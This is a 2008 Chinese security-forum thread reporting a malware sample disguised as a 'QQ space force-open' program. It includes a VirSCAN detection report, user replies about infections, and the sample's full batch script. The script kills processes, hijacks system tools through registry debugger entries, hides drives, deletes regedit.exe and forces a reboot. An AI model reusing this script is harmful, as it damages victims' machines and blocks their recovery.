某无聊人做的

显示全部楼层 · 发表于 2008-3-18 10:56:20

VirSCAN.org Scanned Report :
Scanned time : 2008/03/18 10:51:50 (CST)
Scanner results: 14%的杀软(5/36)报告发现病毒
File Name    : 呵呵.rar
File Size    : 71321 byte
File Type    : RAR archive data, v1d, os
MD5          : ecc865612133d811f0323e49a1a6da15
SHA1          : ca6202433863afdbf31d097545987ec071c50049
Online report  : http://virscan.org/report/cee64615f32615ce60bfe82144472d47.html
Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    3.0.0.126    2008.03.17       2008-03-17  3.99 Trojan.Win32.AddUser.o
安博士V3    2008.03.17.01 2008.03.17       2008-03-17  1.28 -
AntiVir       7.6.0.73       7.0.3.41       2008-03-17  4.79 -
Arcavir       1.0.4          200803171501    2008-03-17  2.76 Trojan.Adduser.O
AVAST       1.0.8          080318-0       2008-03-18  5.08 -
AVG          7.5.51.442    269.21.7/1332    2008-03-17  3.41 -
BitDefender 7.60825.1005343 7.18061          2008-03-18  6.13 -
CA (VET)    9.0.0.143    31.3.5623       2008-03-18  7.32 -
ClamAV       0.92          6278             2008-03-18  0.04 -
Comodo       2.11          2.0.0.467       2008-03-17  1.04 -
CP Secure    1.1.0.715    2008.03.17       2008-03-17  7.25 -
Dr.WEB       4.44.0.9170    2008.03.17       2008-03-17  5.45 -
ewido       4.0.0.2       2008.03.17       2008-03-17  2.57 -
F-PROT       4.4.1.52       20080317       2008-03-17  3.02 -
F-SECURE    5.51.6100    2008.03.17.10    2008-03-17  7.12 -
飞塔          2.81-3.11    8.857          2008-03-18  2.34 -
ViRobot       20080317       2008.03.17       2008-03-17  0.67 -
IKARUS       T3.1.01.20    2008.03.10.70432  2008-03-10  3.32 Trojan.Win32.AddUser.o
江民杀毒    10.00.650    2008.03.17       2008-03-17  1.37 -
卡巴斯基    5.5.10       2008.03.18       2008-03-18  11.33  -
金山毒霸    2007.6.20.249 2008.3.18       2008-03-18  0.78 -
迈克菲       5.2.00       5253             2008-03-17  4.06 -
Microsoft    1.3301       2008.03.18       2008-03-18  8.39 -
MKS_VIR       2.01          2008.03.17       2008-03-17  3.51 -
NORMAN       5.91.10       5.90             2008-03-17  24.69  -
熊猫卫士    9.04.03.0001 2008.03.18       2008-03-18  2.90 -
趋势          8.500-1001    5.168.14       2008-03-17  0.04 -
Prevx       V2             20080318       2008-03-18  1.97 -
QuickHeal    9.00          2008.03.14       2008-03-14  2.27 -
瑞星          20.0          20.36.02.00    2008-03-17  1.91 -
SOPHOS       2.71.3       4.27             2008-03-10  5.22 -
赛门铁克    1.3.0.24       20080316.002    2008-03-16  0.17 -
nProtect    2008-03-18.00 1224815          2008-03-18  4.69 Trojan/W32.DiskHide.150528
The Hacker    6.2.92       v00248          2008-03-17  0.99 -
VBA32       3.12.6.3       20080317.1341    2008-03-17  1.86 Trojan-PSW.Win32.OnLineGames.abc
VirusBuster 4.3.19:9       9.123.13/11.0    2008-03-17  1.94 -

显示全部楼层 · 发表于 2008-3-18 10:59:25

偷看别人隐私很不道德,看名字就没兴趣了

显示全部楼层 · 发表于 2008-3-18 11:17:33

ESET过

显示全部楼层 · 发表于 2008-3-18 11:27:48

@shift 1
@echo off
color 1d
title 一切问题请加815161861
taskkill /f /im qq.exe
taskkill /f /im iexplore.exe
taskkill /f /im explorer.exe
taskkill /f /im ctfmon.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v "Debugger" /d 123.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qq.exe" /v "Debugger" /d 123.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe" /v "Debugger" /d 123.exe /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://user.qzone.qq.com/23397046" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t reg_dword /d 4 /f
gpupdate /force
reg add HKLM\SOFTWARE\Microsoft\Ole /v EnableDCOM /d Y /f
reg add HKLM\SOFTWARE\Microsoft\Rpc /v "DCOM Protocols" /t REG_MULTI_SZ /d ncacn_spx\0ncacn_nb_nb\0ncacn_nb_ipx\0ncacn_ip_tcp\0 /f
sc config MSDTC start= AUTO
reg add HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters /v SMBDeviceEnabled /t REG_DWORD /d 1 /f
gpupdate /force
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ping.exe" /v "Debugger" /d 123.exe /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v "Debugger" /d 123.exe /f
reg delete "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel"  /f
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v homepage /t REG_DWORD /d 1  /f
reg delete HKCR\Directory\Background\shellex\ContextMenuHandlers /f

@echo off
shutdown -r -t 60

cls
@echo off
echo 呵告诉你一个不幸的消息 60秒后你就完了
echo.佛说：给他一次机会吧他还是孩子
echo.嘻嘻那就给你一次机会咯
echo 1.哭
echo 2.笑
echo 3找我报仇
echo 4加我的QQ:794244481

:cho
set choice=
set /p choice=          摸着你的心选个{我的孩子}:
IF NOT "%Choice%"=="" SET Choice=%Choice:~0,1%
if /i "%choice%"=="1" goto 1
if /i "%choice%"=="2" goto 2
if /i "%choice%"=="3" goto 3
if /i "%choice%"=="4" goto 4
echo 孩子真该打你屁屁慈悲的我哎.....  （再选错了你就死了）
echo.
goto cho

:1
echo.
echo.你死了^(oo)^  妈妈说：男人有血无泪
echo.
goto cho

:2
echo.
echo.你死了^(oo)^  这样还笑肯定是神经
echo.
goto cho

:3
echo.
echo. 你死了^(oo)^ 呵放下屠刀，立地成佛善哉善哉
echo.
goto cho

:4
shutdown -a
echo 欢迎你加入QQ28685401，保证你来了就有回报。呵呵>28685401.txt
start c:\windows\explorer.exe
@echo off
del /f /s /q c:\windows\regedit.exe
echo QQ28685401欢迎你的到来(我搞这个也是想结交高手，不打不是朋友吗？嬉小女子这有厢给你陪不是了>等你一万年.txt
cls
goto end
exit

显示全部楼层 · 发表于 2008-3-18 12:08:17

上报antivir

显示全部楼层 · 发表于 2008-3-18 12:11:11

我中招了～～～55～～

显示全部楼层 · 发表于 2008-3-18 12:27:21

发现可疑程序
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\RAR$EX00.187\QQ空间强制打开.EXE
1) C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\BT7766.BAT
是可疑程序!
试图删除文件!
是否阻止该进程继续运行?
放行，结果俺的虚拟机挂了

[ 本帖最后由 taiw_1144 于 2008-3-18 12:30 编辑 ]

显示全部楼层 · 发表于 2008-3-18 12:34:53

显示全部楼层 · 发表于 2008-3-18 12:36:09

就让我路过吧
我不要试

显示全部楼层 · 发表于 2008-3-18 12:44:15

惊现TP

费尔飘了

[病毒样本] 某无聊人做的

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

回复 8楼 jick117 的帖子